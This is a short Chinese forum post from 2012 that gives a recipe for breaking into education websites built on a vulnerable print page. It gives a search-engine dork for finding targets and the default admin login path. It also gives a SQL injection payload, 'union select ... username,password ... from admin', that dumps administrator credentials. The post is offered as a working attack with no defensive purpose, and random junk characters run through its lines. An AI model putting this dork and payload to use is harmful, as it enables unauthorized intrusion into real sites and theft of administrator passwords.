教育站打印页面漏洞
& U% i1 O; c2 r3 I& O百度或google搜索 inurl:info_Print.asp?ArticleID=9 E( b5 }, l) o' f4 k& i. S* ]' `& Q
默认后台:/ad_login.asp- a2 C5 S8 _+ J" H" O0 f3 k! d/ `. \6 y
爆管理员密码:
2 V/ N3 N/ u9 A9 w2 ~( {- p在 域名/inurl:info_Print.asp?ArticleID=数字 后边加空格,然后加下边的红色语句,回车即可
4 d0 p8 K3 D3 S7 }: G/ H2 \, m. ^+ k' Y e Q9 ~7 ^
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
7 z) ?3 D M% s8 Z& i# Q6 N+ T
" l4 \5 F8 E' T& d( C+ C作者:佚名 3 ^2 p+ W9 k7 h
/ @1 |; W# C, ]& N6 {! \ 8 F2 O8 G0 S3 t, S6 ~
|
发表于 2012-10-31 08:37:31
收藏
支持
反对